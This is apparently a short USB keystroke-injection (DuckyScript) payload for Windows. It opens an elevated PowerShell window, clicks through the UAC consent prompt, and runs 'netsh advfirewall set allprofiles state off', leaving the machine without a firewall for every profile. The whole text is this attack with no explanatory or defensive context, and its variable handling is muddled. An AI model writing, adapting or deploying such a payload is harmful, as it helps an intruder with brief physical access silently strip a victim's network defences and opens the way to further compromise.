GUI r
DELAY 200
STRING powershell
CTRL SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
STRING $netf=set-netfirewallprofile -profile domain,public,private -enabled true
ENTER
STRING $netsh=netsh advfirewall set allprofiles state off
ENTER
STRING $netf
ENTER
DELAY 1000
STRING $netsh
ENTER 
STRING exit
ENTER